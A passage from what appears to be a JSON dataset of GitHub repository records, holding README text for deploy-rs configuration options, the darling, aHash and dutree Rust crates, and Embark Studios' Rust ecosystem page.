./some-random-system/configuration.nix ];\n };\n\n deploy.nodes.some-random-system.profiles.system = {\n user = \"root\";\n path = deploy-rs.lib.x86_64-linux.activate.nixos self.nixosConfigurations.some-random-system;\n };\n\n # This is highly advised, and will prevent many possible mistakes\n checks = builtins.mapAttrs (system: deployLib: deployLib.deployChecks self.deploy) deploy-rs.lib;\n };\n}\n```\n\n### Profile\n\nThis is the core of how `deploy-rs` was designed, any number of these can run on a node, as any user (see further down for specifying user information). If you want to mimic the behaviour of traditional tools like NixOps or Morph, try just defining one `profile` called `system`, as root, containing a nixosSystem, and you can even similarly use [home-manager](https://github.com/nix-community/home-manager) on any non-privileged user.\n\n```nix\n{\n # A derivation containing your required software, and a script to activate it in `${path}/deploy-rs-activate`\n # For ease of use, `deploy-rs` provides a function to easily add the required activation script to any derivation\n # Both the working directory and `$PROFILE` will point to `profilePath`\n path = deploy-rs.lib.x86_64-linux.activate.custom pkgs.hello \"./bin/hello\";\n\n # An optional path to where your profile should be installed to, this is useful if you want to use a common profile name across multiple users, but would have conflicts in your node's profile list.\n # This will default to `\"/nix/var/nix/profiles/$PROFILE_NAME` if `user` is root (see: generic options), and `/nix/var/nix/profiles/per-user/$USER/$PROFILE_NAME` if it is not.\n profilePath = \"/nix/var/nix/profiles/per-user/someuser/someprofile\";\n\n # ...generic options... (see lower section)\n}\n```\n\n### Node\n\nThis defines a single node/server, and the profiles you intend it to run.\n\n```nix\n{\n # The hostname of your server. 
Can be overridden at invocation time with a flag.\n hostname = \"my.server.gov\";\n\n # An optional list containing the order you want profiles to be deployed.\n # This will take effect whenever you run `deploy` without specifying a profile, causing it to deploy every profile automatically.\n # Any profiles not in this list will still be deployed (in an arbitrary order) after those which are listed\n profilesOrder = [ \"something\" \"system\" ];\n\n profiles = {\n # Definition format shown above\n system = {};\n something = {};\n };\n\n # ...generic options... (see lower section)\n}\n```\n\n### Deploy\n\nThis is the top level attribute containing all of the options for this tool\n\n```nix\n{\n nodes = {\n # Definition format shown above\n my-node = {};\n another-node = {};\n };\n\n # ...generic options... (see lower section)\n}\n```\n\n### Generic options\n\nThis is a set of options that can be put in any of the above definitions, with the priority being `profile > node > deploy`\n\n```nix\n{\n # This is the user that deploy-rs will use when connecting.\n # This will default to your own username if not specified anywhere\n sshUser = \"admin\";\n\n # This is the user that the profile will be deployed to (will use sudo if not the same as above).\n # If `sshUser` is specified, this will be the default (though it will _not_ default to your own username)\n user = \"root\";\n\n # Which sudo command to use. Must accept at least two arguments:\n # the user name to execute commands as and the rest is the command to execute\n # This will default to \"sudo -u\" if not specified anywhere.\n sudo = \"doas -u\";\n\n # This is an optional list of arguments that will be passed to SSH.\n sshOpts = [ \"-p\" \"2121\" ];\n\n # Fast connection to the node. If this is true, copy the whole closure instead of letting the node substitute.\n # This defaults to `false`\n fastConnection = false;\n\n # If the previous profile should be re-activated if activation fails.\n # This defaults to `true`\n autoRollback = true;\n\n # See the earlier section about Magic Rollback for more information.\n # This defaults to `true`\n magicRollback = true;\n\n # The path which deploy-rs will use for temporary files; this is currently only used by `magicRollback` to create an inotify watcher for confirmations\n # If not specified, this will default to `/tmp`\n # (if `magicRollback` is in use, this _must_ be writable by `user`)\n tempPath = \"/home/someuser/.deploy-rs\";\n\n # Build the derivation on the target system. \n # Will also fetch all external dependencies from the target system's substituters.\n # This defaults to `false`\n remoteBuild = true;\n}\n```\n\n## About Serokell\n\ndeploy-rs is maintained and funded with \u2764\ufe0f by [Serokell](https://serokell.io/).\nThe names and logo for Serokell are trademarks of Serokell O\u00dc.\n\nWe love open source software! 
See [our other projects](https://serokell.io/community?utm_source=github) or [hire us](https://serokell.io/hire-us?utm_source=github) to design, develop and grow your idea!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TedDriggs/darling", "link": "https://github.com/TedDriggs/darling", "tags": ["rust", "proc-macro"], "stars": 688, "description": "A Rust proc-macro attribute parser", "lang": "Rust", "repo_lang": "", "readme": "Darling\n=======\n\n[![Build Status](https://github.com/TedDriggs/darling/workflows/CI/badge.svg)](https://github.com/TedDriggs/darling/actions)\n[![Latest Version](https://img.shields.io/crates/v/darling.svg)](https://crates.io/crates/darling)\n[![Rustc Version 1.31+](https://img.shields.io/badge/rustc-1.31+-lightgray.svg)](https://blog.rust-lang.org/2018/12/06/Rust-1.31-and-rust-2018.html)\n\n`darling` is a crate for proc macro authors, which enables parsing attributes into structs. It is heavily inspired by `serde` both in its internals and in its API.\n\n# Benefits\n* Easy and declarative parsing of macro input - make your proc-macros highly controllable with minimal time investment.\n* Great validation and errors, no work required. When users of your proc-macro make a mistake, `darling` makes sure they get error markers at the right place in their source, and provides \"did you mean\" suggestions for misspelled fields.\n\n# Usage\n`darling` provides a set of traits which can be derived or manually implemented.\n\n1. `FromMeta` is used to extract values from a meta-item in an attribute. Implementations are likely reusable for many libraries, much like `FromStr` or `serde::Deserialize`. Trait implementations are provided for primitives, some std types, and some `syn` types.\n2. `FromDeriveInput` is implemented or derived by each proc-macro crate which depends on `darling`. This is the root for input parsing; it gets access to the identity, generics, and visibility of the target type, and can specify which attribute names should be parsed or forwarded from the input AST.\n3. `FromField` is implemented or derived by each proc-macro crate which depends on `darling`. Structs deriving this trait will get access to the identity (if it exists), type, and visibility of the field.\n4. `FromVariant` is implemented or derived by each proc-macro crate which depends on `darling`. Structs deriving this trait will get access to the identity and contents of the variant, which can be transformed the same as any other `darling` input.\n5. `FromAttributes` is a lower-level version of the more-specific `FromDeriveInput`, `FromField`, and `FromVariant` traits. Structs deriving this trait get a meta-item extractor and error collection which works for any syntax element, including traits, trait items, and functions. 
This is useful for non-derive proc macros.\n\n## Additional Modules\n* `darling::ast` provides generic types for representing the AST.\n* `darling::usage` provides traits and functions for determining where type parameters and lifetimes are used in a struct or enum.\n* `darling::util` provides helper types with special `FromMeta` implementations, such as `IdentList`.\n\n# Example\n\n```rust,ignore\n#[macro_use]\nextern crate darling;\nextern crate syn;\n\n#[derive(Default, FromMeta)]\n#[darling(default)]\npub struct Lorem {\n #[darling(rename = \"sit\")]\n ipsum: bool,\n dolor: Option<String>,\n}\n\n#[derive(FromDeriveInput)]\n#[darling(attributes(my_crate), forward_attrs(allow, doc, cfg))]\npub struct MyTraitOpts {\n ident: syn::Ident,\n attrs: Vec<syn::Attribute>,\n lorem: Lorem,\n}\n```\n\nThe above code will then be able to parse this input:\n\n```rust,ignore\n/// A doc comment which will be available in `MyTraitOpts::attrs`.\n#[derive(MyTrait)]\n#[my_crate(lorem(dolor = \"Hello\", sit))]\npub struct ConsumingType;\n```\n\n# Attribute Macros\nNon-derive attribute macros are supported.\nTo parse arguments for attribute macros, derive `FromMeta` on the argument receiver type, then pass `&syn::AttributeArgs` to the `from_list` method.\nThis will produce a normal `darling::Result` that can be used the same as a result from parsing a `DeriveInput`.\n\n## Macro Code\n```rust,ignore\nuse darling::FromMeta;\nuse syn::{AttributeArgs, ItemFn};\nuse proc_macro::TokenStream;\n\n#[derive(Debug, FromMeta)]\npub struct MacroArgs {\n #[darling(default)]\n timeout_ms: Option<u64>,\n path: String,\n}\n\n#[proc_macro_attribute]\nfn your_attr(args: TokenStream, input: TokenStream) -> TokenStream {\n let attr_args = parse_macro_input!(args as AttributeArgs);\n let _input = parse_macro_input!(input as ItemFn);\n\n let _args = match MacroArgs::from_list(&attr_args) {\n Ok(v) => v,\n Err(e) => { return TokenStream::from(e.write_errors()); }\n };\n\n // do things with `args`\n unimplemented!()\n}\n```\n\n## Consuming Code\n```rust,ignore\nuse your_crate::your_attr;\n\n#[your_attr(path = \"hello\", timeout_ms = 15)]\nfn do_stuff() {\n println!(\"Hello\");\n}\n```\n\n# Features\nDarling's features are built to work well for real-world projects.\n\n* **Defaults**: Supports struct- and field-level defaults, using the same path syntax as `serde`. \n Additionally, `Option` and `darling::util::Flag` fields are innately optional; you don't need to declare `#[darling(default)]` for those.\n* **Field Renaming**: Fields can have different names in usage vs. the backing code.\n* **Auto-populated fields**: Structs deriving `FromDeriveInput` and `FromField` can declare properties named `ident`, `vis`, `ty`, `attrs`, and `generics` to automatically get copies of the matching values from the input AST. `FromDeriveInput` additionally exposes `data` to get access to the body of the deriving type, and `FromVariant` exposes `fields`.\n* **Mapping function**: Use `#[darling(map=\"path\")]` or `#[darling(and_then=\"path\")]` to specify a function that runs on the result of parsing a meta-item field. This can change the return type, which enables you to parse to an intermediate form and convert that to the type you need in your struct.\n* **Skip fields**: Use `#[darling(skip)]` to mark a field that shouldn't be read from attribute meta-items.\n* **Multiple-occurrence fields**: Use `#[darling(multiple)]` on a `Vec` field to allow that field to appear multiple times in the meta-item. 
Each occurrence will be pushed into the `Vec`.\n* **Span access**: Use `darling::util::SpannedValue` in a struct to get access to that meta item's source code span. This can be used to emit warnings that point at a specific field from your proc macro. In addition, you can use `darling::Error::write_errors` to automatically get precise error location details in most cases.\n* **\"Did you mean\" suggestions**: Compile errors from derived darling trait impls include suggestions for misspelled fields.\n\n## Shape Validation\nSome proc-macros only work on structs, while others need enums whose variants are either unit or newtype variants.\nDarling makes this sort of validation extremely simple.\nOn the receiver that derives `FromDeriveInput`, add `#[darling(supports(...))]` and then list the shapes that your macro should accept.\n\n|Name|Description|\n|---|---|\n|`any`|Accept anything|\n|`struct_any`|Accept any struct|\n|`struct_named`|Accept structs with named fields, e.g. `struct Example { field: String }`|\n|`struct_newtype`|Accept newtype structs, e.g. `struct Example(String)`|\n|`struct_tuple`|Accept tuple structs, e.g. `struct Example(String, String)`|\n|`struct_unit`|Accept unit structs, e.g. `struct Example;`|\n|`enum_any`|Accept any enum|\n|`enum_named`|Accept enum variants with named fields|\n|`enum_newtype`|Accept newtype enum variants|\n|`enum_tuple`|Accept tuple enum variants|\n|`enum_unit`|Accept unit enum variants|\n\nEach one is additive, so listing `#[darling(supports(struct_any, enum_newtype))]` would accept all structs and any enum where every variant is a newtype variant.\n\nThis can also be used when deriving `FromVariant`, without the `enum_` prefix.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tkaitchuck/aHash", "link": "https://github.com/tkaitchuck/aHash", "tags": ["rust", "hash", "hashing", "aes"], "stars": 687, "description": "aHash is a non-cryptographic hashing algorithm that uses the AES hardware instruction", "lang": "Rust", "repo_lang": "", "readme": "# aHash ![Build Status](https://img.shields.io/github/actions/workflow/status/tkaitchuck/aHash/rust.yml?branch=master) ![Licence](https://img.shields.io/crates/l/ahash) ![Downloads](https://img.shields.io/crates/d/ahash) \n\nAHash is the [fastest](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md#Speed), \n[DOS resistant hash](https://github.com/tkaitchuck/aHash/wiki/How-aHash-is-resists-DOS-attacks) currently available in Rust.\nAHash is intended *exclusively* for use in in-memory hashmaps. \n\nAHash's output is of [high quality](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md#Quality) but aHash is **not** a cryptographically secure hash.\n\n## Design\n\nBecause AHash is a keyed hash, each map will produce completely different hashes, which cannot be predicted without knowing the keys.\n[This prevents DOS attacks where an attacker sends a large number of items whose hashes collide that get used as keys in a hashmap.](https://github.com/tkaitchuck/aHash/wiki/How-aHash-is-resists-DOS-attacks)\n\nThis also avoids [accidentally quadratic behavior by reading from one map and writing to another.](https://accidentallyquadratic.tumblr.com/post/153545455987/rust-hash-iteration-reinsertion)\n\n## Goals and Non-Goals\n\nAHash does *not* have a fixed standard for its output. This allows it to improve over time. 
For example,\nif any faster algorithm is found, aHash will be updated to incorporate the technique.\nSimilarly, should any flaw in aHash's DOS resistance be found, aHash will be changed to correct the flaw.\n\nBecause it does not have a fixed standard, different computers or computers on different versions of the code will observe different hash values.\nAs such, aHash is not recommended for use other than in-memory maps. Specifically, aHash is not intended for network use or in applications which persist hashed values.\n(In these cases `HighwayHash` would be a better choice)\n\nAdditionally, aHash is not intended to be cryptographically secure and should not be used as a MAC, or anywhere which requires a cryptographically secure hash.\n(In these cases `SHA-3` would be a better choice)\n\n## Usage\n\nAHash is a drop-in replacement for the default implementation of the `Hasher` trait. To construct a `HashMap` using aHash \nas its hasher, do the following:\n\n```rust\nuse ahash::{AHasher, RandomState};\nuse std::collections::HashMap;\n\nlet mut map: HashMap<i32, i32, RandomState> = HashMap::default();\nmap.insert(12, 34);\n```\nFor convenience, wrappers called `AHashMap` and `AHashSet` are also provided.\nThese do the same thing with slightly less typing.\n```rust\nuse ahash::AHashMap;\n\nlet mut map: AHashMap<i32, i32> = AHashMap::new();\nmap.insert(12, 34);\nmap.insert(56, 78);\n```\n\n## Flags\n\nThe aHash package has the following flags:\n* `std`: This enables features which require the standard library. (On by default) This includes providing the utility classes `AHashMap` and `AHashSet`.\n* `serde`: Enables `serde` support for the utility classes `AHashMap` and `AHashSet`.\n* `runtime-rng`: Seeds for hashers are obtained from the operating system's random number generator. (On by default)\nThis is done using the [getrandom](https://github.com/rust-random/getrandom) crate.\n* `compile-time-rng`: For OS targets without access to a random number generator, `compile-time-rng` provides an alternative.\nIf `getrandom` is unavailable and `compile-time-rng` is enabled, aHash will generate random numbers at compile time and embed them in the binary.\nThis allows for DOS resistance even if there is no random number generator available at runtime (assuming the compiled binary is not public).\nThis makes the binary non-deterministic. (If non-determinism is a problem see [constrandom's documentation](https://github.com/tkaitchuck/constrandom#deterministic-builds))\n\nIf both `runtime-rng` and `compile-time-rng` are enabled the `runtime-rng` will take precedence and `compile-time-rng` will do nothing.\nIf neither flag is set, seeds can be supplied by the application. [Multiple apis](https://docs.rs/ahash/latest/ahash/random_state/struct.RandomState.html)\nare available to do this.\n\n## Comparison with other hashers\n\nA full comparison with other hashing algorithms can be found [here](https://github.com/tkaitchuck/aHash/blob/master/compare/readme.md)\n\n![Hasher performance](https://docs.google.com/spreadsheets/d/e/2PACX-1vSK7Li2nS-Bur9arAYF9IfT37MP-ohAe1v19lZu5fd9MajI1fSveLAQZyEie4Ea9k5-SWHTff7nL2DW/pubchart?oid=1323618938&format=image)\n\nFor a more representative performance comparison which includes the overhead of using a HashMap, see [HashBrown's benchmarks](https://github.com/rust-lang/hashbrown#performance)\nas HashBrown now uses aHash as its hasher by default.\n\n## Hash quality\n\nAHash passes the full [SMHasher test suite](https://github.com/rurban/smhasher). 
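As mentioned under Flags above, when neither RNG feature is enabled, seeds can be supplied by the application itself. A minimal sketch of explicit seeding via `RandomState::with_seeds` (the constants here are purely illustrative; real applications should derive seeds from a secret or an external randomness source):\n\n```rust\nuse ahash::RandomState;\nuse std::collections::HashMap;\n\n// Fixed seeds give up DOS resistance; only do this when you control the inputs.\nlet build_hasher = RandomState::with_seeds(1, 2, 3, 4);\nlet mut map: HashMap<u32, u32, RandomState> = HashMap::with_hasher(build_hasher);\nmap.insert(42, 7);\n```\n\n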
\n\nThe code to reproduce the result, and the full output [are checked into the repo](https://github.com/tkaitchuck/aHash/tree/master/smhasher).\n\n## Additional FAQ\n\nA separate FAQ document is maintained [here](https://github.com/tkaitchuck/aHash/blob/master/FAQ.md). \nIf you have questions not covered there, open an issue [here](https://github.com/tkaitchuck/aHash/issues).\n\n## License\n\nLicensed under either of:\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any\nadditional terms or conditions.\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "If ahash is using multiple different algorithms under the hood, shouldn't there be multiple different lines for it on the performance graph?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "EmbarkStudios/rust-ecosystem", "link": "https://github.com/EmbarkStudios/rust-ecosystem", "tags": ["rust", "gamedev"], "stars": 686, "description": "Rust wants & tracking for Embark \ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "# Embark Rust Ecosystem\n\n[![Embark logo](media/embark-logo-bg.jpg)](http://embark.games)\n\nHigh-level tracking and discussions about improving Rust and the Rust ecosystem for our game development use cases at [Embark](http://embark.games).\n\nCheck out the __[Issues](https://github.com/EmbarkStudios/rust-ecosystem/issues)__ for active topics. And our [embark.dev](https://embark.dev) open source portal.\n\n## Background\n\nWhen we started Embark, we chose Rust as our primary language for the long term future we are building. 
We love the safety and robustness of the language, the ability to write high performance, safe, and (mostly) bug free code and then fearlessly refactor and change it without common lifetime/ownership, memory safety or race condition problems.\n\nThat, combined with the openness and collaborative nature of the quickly growing ecosystem of and around Rust with crates.io and the tens of thousands of open source crates with a best-in-class package system, [cargo](https://doc.rust-lang.org/cargo/), truly makes Rust [a language for the next 40 years](https://www.youtube.com/watch?v=A3AdN7U24iU).\n\nWe believe that by openly sharing our work, issues, and ideas with the community, we'll create more opportunities for collaboration and discussion to bring us toward a great future for Rust and for the games industry in general.\n\n-- Johan Andersson ([`@repi`](http://twitter.com/repi)), CTO, Embark\n\n## Open Source\n\nOpen source Rust projects we've created so far and are actively using and maintaining:\n\nName | Description | Crates.io\n--- | --- | ---\n\ud83c\udf0b [`ash-molten`](https://github.com/EmbarkStudios/ash-molten.git) | Statically linked MoltenVK for Vulkan on Mac using Ash | [![Latest version](https://img.shields.io/crates/v/ash-molten.svg)](https://crates.io/crates/ash-molten)\n\ud83d\udc77 [`buildkite-jobify`](https://github.com/EmbarkStudios/buildkite-jobify) | Kubekite, but in Rust, using configuration from your repos\n\ud83d\udcdc [`cargo-about`](https://github.com/EmbarkStudios/cargo-about) | Cargo plugin to generate list of all licenses for a crate | [![Latest version](https://img.shields.io/crates/v/cargo-about.svg)](https://crates.io/crates/cargo-about)\n\u274c [`cargo-deny`](https://github.com/EmbarkStudios/cargo-deny) | Cargo plugin to help you manage large dependency graphs | [![Latest version](https://img.shields.io/crates/v/cargo-deny.svg)](https://crates.io/crates/cargo-deny)\n\ud83c\udf81 [`cargo-fetcher`](https://github.com/EmbarkStudios/cargo-fetcher) | `cargo fetch` alternative for use in CI or other \"clean\" environments | [![Latest version](https://img.shields.io/crates/v/cargo-fetcher.svg)](https://crates.io/crates/cargo-fetcher)\n\ud83e\udde0 [`cervo`](https://github.com/EmbarkStudios/cervo) | Middleware used for ML inference in our games. 
| [![Latest version](https://img.shields.io/crates/v/cervo.svg)](https://crates.io/crates/cervo)\n\u2699\ufe0f [`cfg-expr`](https://github.com/EmbarkStudios/cfg-expr) | A parser and evaluator for Rust `cfg()` expressions | [![Latest version](https://img.shields.io/crates/v/cfg-expr.svg)](https://crates.io/crates/cfg-expr)\n\ud83d\udcd2 [`cloud-dns`](https://github.com/EmbarkStudios/cloud-dns) | Client to interact with Google Cloud DNS v1 | [![Latest version](https://img.shields.io/crates/v/cloud-dns.svg)](https://crates.io/crates/cloud-dns) |\n\ud83d\udd25 [`crash-handling`](https://github.com/EmbarkStudios/crash-handling) | Collection of crates for catching and handling crashes\n\u26f4\ufe0f [`discord-sdk`](https://github.com/EmbarkStudios/discord-sdk) | An open implementation of the Discord Game SDK in Rust | [![Latest version](https://img.shields.io/crates/v/discord-sdk.svg)](https://crates.io/crates/discord-sdk)\n\ud83d\ude99 [`gsutil`](https://github.com/EmbarkStudios/gsutil) | A small, incomplete replacement for the official gsutil | [![Latest version](https://img.shields.io/crates/v/gsutil.svg)](https://crates.io/crates/gsutil)\n\ud83d\udca1 [`kajiya`](https://github.com/EmbarkStudios/kajiya) | Experimental real-time global illumination renderer\n\ud83d\udce6 [`krates`](https://github.com/EmbarkStudios/krates) | Creates graphs of crates from cargo metadata | [![Latest version](https://img.shields.io/crates/v/krates.svg)](https://crates.io/crates/krates)\n\ud83c\udd99 [`octobors`](https://github.com/EmbarkStudios/octobors) | GitHub action for automerging PRs based on a few rules\n\ud83c\udfb3 [`physx`](https://github.com/EmbarkStudios/physx-rs) | Use [NVIDIA PhysX](https://github.com/NVIDIAGameWorks/PhysX) in Rust | [![Latest version](https://img.shields.io/crates/v/physx.svg)](https://crates.io/crates/physx)\n\u231b [`poll-promise`](https://github.com/EmbarkStudios/poll-promise) | A Rust promise for games and immediate mode GUIs | [![Latest version](https://img.shields.io/crates/v/poll-promise.svg)](https://crates.io/crates/poll-promise)\n\ud83d\udddc [`presser`](https://github.com/EmbarkStudios/presser) | A helper crate for doing low-level data copies | [![Latest version](https://img.shields.io/crates/v/presser.svg)](https://crates.io/crates/presser)\n\ud83d\udc26 [`puffin`](https://github.com/EmbarkStudios/puffin) | Simple instrumentation profiler for Rust | [![Latest version](https://img.shields.io/crates/v/puffin.svg)](https://crates.io/crates/puffin)\n\ud83d\udcd3 [`relnotes`](https://github.com/EmbarkStudios/relnotes) | Automatic GitHub release notes | [![Latest version](https://img.shields.io/crates/v/relnotes.svg)](https://crates.io/crates/relnotes)\n\ud83d\udc0f [`rpmalloc-rs`](https://github.com/EmbarkStudios/rpmalloc-rs) | Cross-platform Rust global memory allocator using [rpmalloc](https://github.com/rampantpixels/rpmalloc) | [![Latest version](https://img.shields.io/crates/v/rpmalloc.svg)](https://crates.io/crates/rpmalloc)\n\ud83d\udc09 [`rust-gpu`](https://github.com/EmbarkStudios/rust-gpu) | Making Rust a first-class language & ecosystem for GPU code |\n\ud83c\udf0c [`rymder`](https://github.com/EmbarkStudios/rymder) | Unofficial agones client | [![Latest version](https://img.shields.io/crates/v/rymder.svg)](https://crates.io/crates/rymder)\n\ud83c\udd94 [`spdx`](https://github.com/EmbarkStudios/spdx) | Helper crate for SPDX expressions | [![Latest version](https://img.shields.io/crates/v/spdx.svg)](https://crates.io/crates/spdx)\n\ud83d\udee0 
[`spirv-tools-rs`](https://github.com/EmbarkStudios/spirv-tools-rs) | An unofficial wrapper for SPIR-V Tools | [![Latest version](https://img.shields.io/crates/v/spirv-tools.svg)](https://crates.io/crates/spirv-tools)\n\ud83d\udd06 [`superluminal-perf`](https://github.com/EmbarkStudios/superluminal-perf-rs) | [Superluminal Performance](http://superluminal.eu) profiler integration | [![Latest version](https://img.shields.io/crates/v/superluminal-perf.svg)](https://crates.io/crates/superluminal-perf)\n\ud83d\udcc2 [`tame-gcs`](https://github.com/EmbarkStudios/tame-gcs) | Google Cloud Storage functions that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-gcs.svg)](https://crates.io/crates/tame-gcs)\n\ud83d\udd10 [`tame-oauth`](https://github.com/EmbarkStudios/tame-oauth) | Small OAuth crate that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-oauth.svg)](https://crates.io/crates/tame-oauth)\n\ud83e\uddec [`tame-oidc`](https://github.com/EmbarkStudios/tame-oidc) | Small OIDC crate that follows the sans-io approach | [![Latest version](https://img.shields.io/crates/v/tame-oidc.svg)](https://crates.io/crates/tame-oidc)\n\ud83c\udfa8 [`texture-synthesis`](https://github.com/EmbarkStudios/texture-synthesis) | Example-based texture synthesis generator and CLI example | [![Latest version](https://img.shields.io/crates/v/texture-synthesis.svg)](https://crates.io/crates/texture-synthesis)\n\ud83d\udee0 [`tiny-bench`](https://github.com/EmbarkStudios/tiny-bench) | A tiny benchmarking library | [![Latest version](https://img.shields.io/crates/v/tiny-bench.svg)](https://crates.io/crates/tiny-bench) \n\u23f1\ufe0f [`tracing-ext-ffi-subscriber`](https://github.com/EmbarkStudios/tracing-ext-ffi-subscriber) | Subscriber for passing spans to a profiling tool via FFI. | [![Latest version](https://img.shields.io/crates/v/tracing-ext-ffi-subscriber.svg)](https://crates.io/crates/tracing-ext-ffi-subscriber)\n\ud83e\udeb5\ufe0f [`tracing-logfmt`](https://github.com/EmbarkStudios/tracing-logfmt) | A logfmt formatter for tracing-subscriber. | [![Latest version](https://img.shields.io/crates/v/tracing-logfmt.svg)](https://crates.io/crates/tracing-logfmt)\n\ud83d\udcab [`tryhard`](https://github.com/EmbarkStudios/tryhard) | Easily retry futures | [![Latest version](https://img.shields.io/crates/v/tryhard.svg)](https://crates.io/crates/tryhard)\n\nYou can see all these crates on our [crates.io profile](https://crates.io/users/embark-studios).\n\n### Contributing\n\nWe encourage contributions to any of our open source projects. If you're not sure where to start, look at the GitHub issues on any of the above projects!\n\nCheck out [`guidelines.md`](guidelines.md) for our guidelines & policies for how we develop in Rust.\n\nTo make sure we keep a friendly and safe environment for everyone, we have a Contributor Code of Conduct. You can read this in any of our projects' repositories. 
By contributing to our projects, you agree to the code of conduct.\n\n## Areas of Interest\n\nAreas that we are interested in or working on, and want to help see improved in Rust:\n\n* \u2638 __[Distributed systems](https://areweasyncyet.rs/)__ - [async](https://rust-lang.github.io/async-book/), [tokio](https://tokio.rs/), [tonic](https://github.com/hyperium/tonic)\n\n* \ud83d\udd79\ufe0f __[Game engine systems](http://arewegameyet.com/)__ - multiplayer, rendering, physics, audio, server, assets, workflows\n\n* \ud83d\udce6 __Developer experience__ - fast iteration with large projects/monorepos, distributed builds, debugging, profiling, IDE\n\n* \ud83d\udef8 __[WebAssembly](https://webassembly.org/) and [WASI](https://hacks.mozilla.org/2019/03/standardizing-wasi-a-webassembly-system-interface/)__ - sandboxed safe Rust code on client, edge & cloud\n\n* \ud83e\udd16 __[Machine learning](http://www.arewelearningyet.com/)__ - efficient inference, library bindings, training environments\n\n* \ud83d\ude80 __High performance runtime__ - CPU job scheduling, code generation, optimizing crates\n\n* \ud83d\udcfa\ud83d\udcf1 __Console & mobile platform support__ - PlayStation, Xbox, Android. [#18](https://github.com/EmbarkStudios/rust-ecosystem/issues/18)\n\n* \ud83c\udfce [__Rust on GPU__](https://shader.rs) - future compute & ML programming models beyond shaders, \n\nWe track and discuss these from our perspective in the __[Issues](https://github.com/EmbarkStudios/rust-ecosystem/issues)__ for visibility and to get feedback, feel free to join in if you have ideas!\n\nAlso check out the [Rust Game Development Working Group](https://github.com/rust-gamedev/wg).\n\n## Sponsorships\n\nWe believe that open source creators are integral to the success of the Rust ecosystem, as well as our own success. We offer monetary sponsorship to several individuals and projects via Patreon, GitHub and OpenCollective.\n\nProjects we are currently sponsoring:\n\n* __[Bevy](https://bevyengine.org/)__ - _\"A refreshingly simple data-driven game engine built in Rust\"_\n* __[Dimforge](https://www.dimforge.com/)__ - _\"Open-Source Rust crates for numerical simulation\"_\n* __[rust-analyzer](https://github.com/rust-analyzer/rust-analyzer)__ - _\"Bringing a great IDE experience\nto the Rust programming language\"_\n* __[Clap](https://github.com/clap-rs/clap)__ - _\"Fast. Configurable. Argument Parsing for Rust\"_\n* __[Gtk-rs](https://gtk-rs.org/)__ - _\"Rust bindings for GTK+ 3, Cairo, GtkSourceView and other GLib-compatible libraries\"_\n* __[knurling-rs](https://knurling.ferrous-systems.com/)__ - _\"Improving the tools and material used to build, debug, and learn embedded systems\"_\n* __[Tokio](https://tokio.rs)__ - _\"Build reliable network applications without compromising speed\"_\n\nFull list of projects and individual developers we are sponsoring: [OpenCollective](https://opencollective.com/embarkstudios), [GitHub Sponsors](https://github.com/embark-studios) and [Patreon](https://www.patreon.com/embarkstudios/creators).\n\n## Work with us\n\nWe're actively looking to collaborate with developers on the areas discussed in this repository. If you're interested in working on a specific issue or idea highlighted here, please reach out to us at [`opensource@embark-studios.com`](mailto:opensource@embark-studios.com) to discuss contracting opportunities or sponsorship.\n\nWe are also [hiring](https://embark.games/jobs/) for full-time positions remotely within Europe or on-site in Stockholm!\n\nLet's go! 
\ud83d\ude80\n\n## License\n\nLicensed under either of\n\n* Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n* MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted for inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nachoparker/dutree", "link": "https://github.com/nachoparker/dutree", "tags": ["rust", "filesystem"], "stars": 685, "description": "a tool to analyze file system usage written in Rust", "lang": "Rust", "repo_lang": "", "readme": "# dutree\na tool to analyze file system usage written in Rust\n\n![Example](resources/dutree_featured.png)\n\n# Features\n\n - coloured output, according to the LS_COLORS environment variable.\n - display the file system tree\n - ability to aggregate small files\n - ability to exclude files or directories\n - ability to compare different directories\n - fast, written in Rust\n\nMore details at [ownyourbits.com](https://ownyourbits.com/2018/03/25/analize-disk-usage-with-dutree).\n\n# Usage\n\n```\n $ dutree --help\nUsage: dutree [options] <path> [<path>..]\n\nOptions:\n -d, --depth [DEPTH] show directories up to depth N (def 1)\n -a, --aggr [N[KMG]] aggregate smaller than N B/KiB/MiB/GiB (def 1M)\n -s, --summary equivalent to -da, or -d1 -a1M\n -u, --usage report real disk usage instead of file size\n -b, --bytes print sizes in bytes\n -f, --files-only skip directories for a fast local overview\n -x, --exclude NAME exclude matching files or directories\n -H, --no-hidden exclude hidden files\n -A, --ascii ASCII characters only, no colors\n -h, --help show help\n -v, --version print version number\n```\n\n# Installation\n\n```\ncargo install dutree\n```\n\nThere are also standalone binaries for Linux in the [Releases section](https://github.com/nachoparker/dutree/releases)\n\n## Arch Linux\n\nYou can install [the AUR package](https://aur.archlinux.org/packages/dutree/)\nwith an AUR helper like `pacaur`, or manually:\n\n```bash\ngit clone https://aur.archlinux.org/dutree.git\ncd dutree\nmakepkg -si\n```\n\n## Fedora\n\nYou can install `dutree` from the official Fedora repositories:\n\n```sh\n$ sudo dnf -y install dutree\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": 